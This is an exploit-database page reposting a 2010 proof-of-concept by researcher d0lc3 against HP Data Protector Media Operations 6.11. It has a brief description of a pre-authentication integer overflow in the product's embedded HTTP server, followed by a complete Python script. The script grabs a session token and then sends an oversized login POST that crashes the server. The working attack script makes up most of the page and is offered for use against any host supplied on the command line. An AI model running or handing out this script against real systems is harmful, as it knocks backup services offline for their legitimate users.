Home / os / win7

[dos / poc] - HP Data Protector Media Operations 6.11 HTTP S

Posted on 23 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>HP Data Protector Media Operations 6.11 HTTP Server Integer Overflow | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='HP Data Protector Media Operations 6.11 HTTP Server Integer Overflow by d0lc3 in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>====================================================================
HP Data Protector Media Operations 6.11 HTTP Server Integer Overflow
====================================================================

# Exploit Title: HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS
# Date: [date]: 17/09/10
# Author: d0lc3 (@rmallof http://elotrolad0.blogspot.com/)
# Software Link: http://www.hp.com
# Version: 6.11
# Tested on: Windows XP SP3 Spa
#
#Sumary:
&quot;&quot;&quot;
HP Data Protector Media Operations has embebed HTTP server, allowing access through
this protocol for users.
 
Flaw was detected on this implementation, causing remote and pre-authenticated DoS: Integer Overflow
handling string sended length through POST method.
 
Integer Overflow causes unexpected variable initiation (reset to 0) followed by its dereferenciation
(NUll Dereference), crashing server and thus deniying service to legitimate users.
 
This is not explpoitable.
&quot;&quot;&quot;
#PoC:
 
#!/usr/bin/python
 
import socket,sys,time,os
#global vars
neg=&quot;GET / HTTP/1.1

&quot;
lim0=&quot;Location:&quot;                       
lim1=&quot;&amp;&quot;
lim2=&quot;sess=&quot;
buf=&quot;SignInName=&quot;+(&quot;A&quot;*0x8000)+&quot;&amp;SignInPassword=FOO&amp;Sign+In=Log+In&quot; # &gt;= 0x8000 to int overflow
 
def CV():
    os.system(&quot;clear&quot;)
    print&quot;	-HP Data Protector Media Operations 6.11-&quot;
    print&quot;	    -HTTP Remote Denial of Service-&quot;
    print&quot;
[+] Researcher:	Roi Mallo (@rmallof)&quot;
    print&quot;[+] Blog:	http://elotrolad0.blogspot.com/&quot;
    print&quot;[+] Twitter:	https://www.twitter.com/rmallof&quot;
    print&quot;

&quot;
 
def nego(h):                                    #starting connection and getting session
    s=socket.socket()
    try:
        s.connect(h)
    except:
        print&quot;[x] Error connecting to remote host!&quot;
        sys.exit(0)
    s.send(neg)
    time.sleep(1)
    rec=s.recv(1024)
    s.close()
    return rec
 
def buildPOST(s,h,p,b):                             #building POST request for crashes server
    P=&quot;POST /4daction/wHandleURLs/handleSignIn?sess=&quot;+s+&quot;&amp;siteCode=0&amp;lang=en&amp; HTTP/1.1
&quot;
    P+=&quot;Host: &quot;+h+&quot;
&quot;
    P+=&quot;User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10
&quot;
    P+=&quot;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
&quot;
    P+=&quot;Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
&quot;
    P+=&quot;Accept-Encoding: gzip,deflate
&quot;
    P+=&quot;Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
&quot;
    P+=&quot;Keep-Alive: 115
&quot;
    P+=&quot;Connection: keep-alive
&quot;
    P+=&quot;Referer: http://&quot;+h+p+&quot;
&quot;
    P+=&quot;Content-Type: application/x-www-form-urlencoded
&quot;
    P+=&quot;Content-Length: %s
&quot; % str(len(b))
    P+=&quot;
&quot;
    P+=b
    time.sleep(1)
    return P
 
def main():
    CV()       
    if len(sys.argv)!=2:
        print&quot;
[x] Usage: &quot;+sys.argv[0]+&quot; &lt;host&gt;

&quot;                           
        sys.exit(0)
    else:
        host=sys.argv[1]
        hostd=host,80
    #1
    print&quot;[-] Getting HTTP session...&quot;
    r=nego(hostd)                               #getting new session...
    path=r[r.index(lim0)+len(lim0)+1:r.rindex(lim1)+1]          #search for PATH
    sess=path[path.index(lim2)+len(lim2):path.index(lim1)+len(lim1)-1]  #search for SESSION hash
    time.sleep(1)
    print&quot;[+] 0k, session =&quot;+sess
    time.sleep(1)
    #2
    s=socket.socket()
    s.connect(hostd)
    print&quot;[-] Bulding POST [Content-Length: %d bytes]...&quot; % len(buf)
    POST=buildPOST(sess,host,path,buf)                  #build POST request with new session
    print&quot;[+] Done, Sayonara ;)&quot;
    s.send(POST)                                #crash it 4fun&amp;profit :)
    time.sleep(1)                          
    s.close()
if __name__==&quot;__main__&quot;:
    main()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-23]</pre></body></html>

 

TOP

Malware :

Exploits :